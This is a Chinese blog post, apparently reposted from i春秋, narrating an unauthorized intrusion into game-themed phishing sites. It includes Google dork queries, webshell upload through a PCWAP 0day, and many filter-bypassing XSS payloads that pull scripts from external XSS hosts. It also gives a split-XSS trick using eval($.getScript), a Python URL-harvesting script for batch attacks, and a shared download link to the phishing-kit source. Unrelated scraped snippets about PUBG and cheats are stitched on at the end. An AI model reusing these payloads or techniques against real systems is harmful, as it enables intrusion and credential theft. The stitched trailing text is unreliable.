攻破黑市之拿下吃鸡,DNF钓鱼站群(结局彩蛋)

i春秋作家:风在指尖

前段时间有个网友给我发了个网址,说找到个专门做钓鱼网站的连接,让我看看,然后就引出了下面的一系列事件

http://mfnyongshihuigui.jiebao8.top

网址如下

当时也没在意,有天闲着无聊就开干了,

直接打开 jiebao8.top

果然是钓鱼站 先对其进行一些信息搜集看看

http://www.jiebao8.top/robots.txt

对其用谷歌语法搜索,看看是否有以下漏洞,

1目录遍历漏洞  语法为: site:jiebao8.top intitle:index.of

2 配置文件泄露  语法为: site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | extra | ext:ini

3数据库文件泄露  site:jiebao8.top ext:sql | ext:dbf | ext:mdb

4日志文件泄露 site:jiebao8.top ext:log

5备份和历史文件 site:jiebao8.top ext:bkf | ext:bkp | ext:bak | extld | ext:backup

6SQL错误  site:jiebao8.top intext:”sql syntax near” | intext:”syntax error has occurred” | intext:”incorrect syntax near” | intext:”unexpected end of SQL command” | intext:”Warning: mysql_connect()” | intext:”Warning: mysql_query()” | intext:”Warning: pg_connect()”

7公开文件信息  site:jiebao8.top ext:doc | ext:docx | extdt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv

8  phpinfo()  site:jiebao8.top ext:php intitle:phpinfo “published by the PHP Group”

然而没查到什么

将此域名放到情报分析里查看

https://x.threatbook.cn/domain/mfnyongshihuigui.jiebao8.top

发现IP地址一共有230个域名

谁没事会注册这么多域名,肯定拿来干坏事

查询此IP162.247.96.114

开放端口:21(ftp),80,102(ssh),3306

对ssh端口进行爆破,无果~

对该域名进行CMS识别

http://www.yunsee.cn/

结果为 PCWAP

PCWAP一个小众的CMS系统,手里头刚好有个PCWAP的0day越权进后台查看信息

http://mfnyongshihuigui.jiebao8.top

修改文件上传类型,添加.php

然后我们上传图片LOGO,因为修改了上传类型,直接上传大马试试上传大马,小马,一句话

这里大概有20多个钓鱼网站,DNF,吃鸡的

尝试着提权,但是发现执行不了linux命令,可能禁止了

全部都是钓鱼站

我直接打包了所有源码,说实话,我很想对其进行代码审计,不过,我代码审计不是我的强项

而且种钓鱼网站我好像搞过,不过当时没盲打进去,现在拿下了源码,我肯定要试试这边的过滤规则

因为我本人不会代码审计,所以说拿到后台以后也只是凭着自己的经验模糊测试在提交账号密码时抓包

输入paylaod

后台看回显

c标签被成功执行,证明有XSS漏洞, 现在我们来进一步测试

paylaod为

发现页面被拦截,难道alert是危险字符?换个事件看看

payload:

成功弹窗,现在我们来开始构造xss paylaod

如果你之前看过我的文章,我发布过很多过狗的xss paylaod连接如下:https://bbs.ichunqiu.com/thread-31886-1-1.html

我们直接拿来用

<svg/onload=”[1].find(function(){with(`\docomen\.1\t\.1`);;body.appendChild(createElement(‘script’)).src=’http://xss.tv/XA‘})”>

提交数据为

u=21312312&p=<svg/onload=”[1].find(function(){with(`\docomen\.1\t\.1`);;body.appendChild(createElement(‘script’)).src=’http://xss.tv/XA‘})”>&bianhao=1

被拦截了,在测试看看

payload为,对关键字符base64编码试试

u=21312312&p=<object data=”data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4=”></object> &bianhao=1

被拦截

用string.fromcharcode函数构造payload 试试

u=21312312&p=<b>GO-GO==></b><select autofocus onfocus=\u0064ocument.write(String.fromCharCode(60,115,101,108,101,99,116,32,97,117,116,111,102,111,99,117,115,32,111,110,102,111,99,117,115,61,115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,80,116,39,41,59,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,99,61,39,47,47,119,119,119,46,48,50,49,108,97,111,100,111,110,103,102,97,46,99,111,109,47,101,47,55,46,50,46,106,115,39,62))>&bianhao=1

还是不行 我接近试了上百个payload,回显都是

被拦截

凭着我单身23年的经验发现这个xss 过滤机制可能没那么简单
通过不断的模糊测试,发现对方的过滤机制大概如下:
带有a字符被拦截,已经onmouseover,onload等常见事件全部被过滤,最长处最大长度为32个字符,+,&#等特殊字符被过滤,这就意味着,a标签,各种编码机制都不能用~~真是有够变态的.

但是也通过测试得知能够执行的事件有onscroll,onfocus,onfocus,并且unciode 编码没被过滤
没过滤的标签为  body,input,br,i 标签

只有32个字符能输入,我目前搜集最短的xss paylaod 20个

也就是

但是script早就被过滤了

32个字符,过滤了这么多肯定是构造不了,所以只能用拆分跨站,通过查看源码我发现了一个新的思路,

就是他后台调用的jquery框架

由此自己研究出了一个新的拆分跨站
思路就是:
我们先构造一个函数,只要鼠标滚轮移动,就让所有的事件获取焦点,再用input标签启动onfocus函数 分别加载我的XSS站点(如果你没听懂的话,看看下面的代码)代码如下:

首先我们来了解下 一些javascript的事件以及函数

onscroll 事件 在元素滚动条在滚动时触发。
onfocus 事件在对象获得焦点时发生。

以及浏览器的一些特性,

当我们输入i标签时,我们不需要输入 闭合标签(原本完整的i标签是)


而现在我们只需要输入

即可

我们进入后台查看如下

后面的标签被自动 补上去了  了解了这些,看接下来的最新拆分跨站就容易多了

拆分跨站代码如下

这段代码的意思是,只要对方移动鼠标滑轮或者手机端向下面滑动,就会产生出一个事件   $(`*`).focus() 这是jq的选择器,意思是让所有的元素获得焦点然后下面的两个input标签就获取了焦点,  而input标签里有一个事件,onfocus,当input标签获取了焦点的时候,就会触发onfocus函数,我在onfocus函数里的代码意思是 获取i标签里的内容(也就是 $.getScript(`//xs.tv`) ),并且用eval执行它,所以这段代码整体的执行效果

就是只要对方移动了滑轮,就会执行 eval($.getScript(`//xs.tv`)) 
如果你还没看明白的话,那就实践试试吧我们把xss paylad 分成5段分别输入进去 效果如下

通过抓包得出

已经成功加载了我的XSS站点,想要拿下这种类型的后台,就需要两位数的域名

根据这个站点的关键词

幸运冒险家启航-心悦俱乐部官方网站

腾讯游戏老兵空降回归-绝地求生官方网站-腾讯游戏   (吃鸡的钓鱼站找不到)

百度一搜索,全是钓鱼界面 于是我写了个批量攻击的python脚本,先用采集器采集这些钓鱼网址,再批量注入

import requests

from bs4 import BeautifulSoup

import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

headers={

”User-Agent”: “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0″,

’Accept-Language’ : ‘zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3′,

’Connection’ : ‘keep-alive’,

’Accept’ : ‘text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′,

’X-Forwarded-For’:’120.239.169.74′

}

#设置头部

proxies={

“http”:”http://127.0.0.1:8080“,

“https”:”https://127.0.0.1:8080“,

}

#设置代理

for i in range(0,200,10):  #根据百度的url设置搜索1-20页

bd_search=”https://www.baidu.com/s?wd=幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏&pn=%s” % str(i)  #关键词搜索

r=requests.get(bd_search,headers=headers,verify=False,proxies=proxies,timeout=2)  #发起请求

f=open(“1.html”,”a+”,encoding=”utf-8″)  #把请求结果保存到1.html里

f.write(r.text)

f.close()

soup=BeautifulSoup(r.text,”lxml”)

url_list=soup.select(“.t > a”)  #对请求回来的内容进行查找,找出a标签里(找出钓鱼链接)

for url in url_list:

real_url=url[‘href‘]  #遍历循环,并且打印

try:

r=requests.get(real_url,headers=headers,verify=False,proxies=proxies,timeout=2)  #再次请求

print(r.url)  #打印出钓鱼链接

f=open(“exp.txt”,”a+”,encoding=”utf-8″)

f.write(r.url+”\n”)   #把查找到的钓鱼链接保存到exp.txt里

f.close()

except Exception as e:

print(e)

效果如下,找到的钓鱼链接

然后再批量渗透,自己也写了一个批量渗透钓鱼网站的脚本(不打算发,怕被人说我传播黑客工具。。。。)拿到的钓鱼网站大部分貌似都没什么账号密码 就看到这个吃鸡的钓鱼站

我帮这位老兄删光了

一个钓鱼站大概一天上百个账号密码,不知道有多少人QQ是这样被盗的此次渗透,可能话比较多,各位别介意,这也是为了XSS基础比较薄弱的学友考虑~~嘿嘿~~~

结局彩蛋:
吃鸡钓鱼,DNF钓鱼源码也打包好了,链接:https://pan.baidu.com/s/1WR2V0SsTY8OrIoVxEW0SdA

>>>点我得密码

原文地址:https://www.cnblogs.com/ichunqiu/p/9072306.html

时间: 2024-10-01 13:04:38

攻破黑市之拿下吃鸡,DNF钓鱼站群(结局彩蛋)的相关文章

网曝“吃鸡”国服17日上线,关于外挂,这些你都知道吗?

先来一组思考题: 听舅舅党说,腾讯<绝地求生>国服会在1月17日上线? 如果不免费,你会不会玩? 如果没外拐,你会不会玩? 如果免费+道具付费,你会不会玩? 如果只收你皮肤的钱,你会不会玩? 为什么"吃鸡"官方对外挂认怂? 在与外挂制作团队进行了长达半年的"交战"后,蓝洞官方终于认怂了,主创伦丹格林近日公开表示:中国的外挂制作团队太厉害了,利用游戏内核来攻破防线,甚至许多蓝洞自己的程序员都没发现的Bug也被找了出来,你们为什么不选择来蓝洞上班呢. 言归正

《绝地求生》大热!只因每个“吃鸡群众”心中都有个主角光环

如果说2017年最火爆的词汇,或许是"大吉大利.晚上吃鸡".基本上每一个人的朋友圈里,都能看到这句话的踪影. 如果说2017年最火热的游戏,可能就要分上下集了.上半年是手机游戏<王者荣耀>,这还只主要是在中国火爆,而在下半年则是<绝地求生:大逃杀>,而它实实在在是世界级的爆款. 前述"大吉大利.晚上吃鸡"一词恰恰出身于这款<绝地求生:大逃杀>,谁能在游戏中获得最后的胜利,屏幕上就会显示出上述字眼,以至于很多玩家都亲切的将其称之为吃

团队项目-《野狼吃鸡》需求分析

需求分析报告文档 1. 引言.... 1 1.1 编写目的... 1 1.2 预期读者和阅读建议... 1 1.3 产品范围... 2 2. 综合描述.... 2 2.1 产品的状况... 2 2.2 产品核心逻辑... 2 2.3 运行环境... 3 2.4 设计和实现上的限制... 3 2.5 假设和约束(依赖) 3 2.6 用户界面... 3 3. 功能要求.... 5 3.1 关于游戏产品结构图... 5 3.2 关于游戏模式流程图... 6 4. 4.性能需求.... 7 4.1时间特

【程序员的吃鸡大法】利用OCR文字识别+百度算法搜索,玩转冲顶大会、百万英雄、芝士超人等答题赢奖金游戏

[先上一张效果图]: 一.原理: 其实原理很简单: 1.手机投屏到电脑: 2.截取投屏画面的题目部分,进行识别,得到题目和三个答案: 3.将答案按照一定的算法,进行搜索,得出推荐答案: 4.添加了一些其他辅助功能,比如:浏览器搜索结果展示.关键字高亮.浏览器可点击等: 二.二营长,把我的意大利...............代码,呈上来,给友军看看 1.手机投屏: 方式很多,这里只列举几个比较常用.且自己感觉简单易用的: A.IOS:局域网内,可以利用iTools里的苹果录屏大师(airplay)

多校寒训TaoTao要吃鸡dp(未完成)

题目描述 Taotao的电脑带不动绝地求生,所以taotao只能去玩pc版的荒野行动了, 和绝地求生一样,游戏人物本身可以携带一定重量m的物品,装备背包 之后可以多携带h(h为0代表没有装备背包)重量的东西.玩了几天 taotao发现了一个BUG,当装备背包之后,如果可携带重量没有满,就 可以拿一个任意重的东西.(解释看样例)有一天taotao空降到了一个 奇怪的岛上,岛上有n件装备,每个装备都有重量Wi和威力值Vi,但taotao 不认识这些装备,所以他来求助你,挑选威力最大的装备,帮助他吃鸡

如何禁止吃鸡游戏,如何屏蔽局域网用户玩绝地求生、终结者2、荒野行动等手游?

<绝地求生>(PUBG) 是一款突破性的战术竞技类游戏,凭借其独特创新的玩法模式,写实风格带来的代入感和沉浸感深受玩家喜爱.目前,吃鸡类游戏深受用户喜爱,也涌现了一大批的同款端游和手游. 对于上网行为管理来说,我们要讨论的是如何禁止局域网客户机(电脑和手机)玩这类游戏.在本文中,我将演示如何用WSG-500E(WFilter NGF系统)来屏蔽局域网用户玩吃鸡类游戏. 1. 在"应用过滤"中屏蔽"steam游戏平台"和"网易游戏".

游戏公司靠外挂赚得盆满钵满?吃鸡游戏封号100年事件还能这么看

据报道,2月3日晚,虎牙签约的XZ战队队长星魂在直播<绝地求生>途中,被蓝洞官方"实锤"开挂,直接封号100年. 100年太久,估计等不到解封的日子了.不过有一种更为有趣的说法是,蓝洞官方在吃鸡游戏上封号,力度之所以这么大,是因为太有赚头了. 近日,数据机构SuperData公布了一份新的报告,其中,在绝地求生发售8个月的时间中,累计总收入达到了7.14亿美元(约人民币44.8亿). 请注意,到了12月底,该游戏的总封禁数量达到了150万. 你觉得许多用过外挂的玩家,到底为

除了在坦克大战、吃鸡、跳一跳上作弊,物理外挂带给我们什么脑洞?

外挂,是什么?如果换个高大上的说法,其实是游戏玩家为了解放双手而创造出来的产品.当然,实际来说就是为了偷懒.当然,还有更高大上的说法,比如成为发明创造的起点. 我自己就深有感触.话说,小时候在红白机上玩<坦克大战>,为了省事,我也曾用夹子卡住射击的那个按钮,然后解放双手嗑瓜子的说. 这可以看做是外挂作弊,也可以看作是创意脑洞,看怎么去研判.而在创意产业里,针对很多产品的不完善或用户需求的多样性,外挂总在不断推动着创意的进化. 这不,前不久,随着微信小程序<跳一跳>的刷屏,不也有许多

老司机带你在MySQL领域“大吉大利,晚上吃鸡”

老张superzs来更新博客啦,大家新年好啊,好久没有跟大家见面了.说句走心的话,很想你们!最近因为要出版自己的第一本书<MySQL王者晋级之路>一直在忙于宣传.实在抱歉,没能及时更博.今后还是会多奉献精彩文章! 最近绝地求生这个游戏太火了,当我问我的朋友们你们闲时在干嘛,基本上告诉我的答案都是在"吃鸡"啊!想必很多老铁们也玩,那一定应该知道绝地求生中有把枪叫AWM.此枪伤害裸132点,爆头330,即使三级头爆头必死,无防弹衣或者防弹衣有破损,一枪死.是这个游戏中威力最大的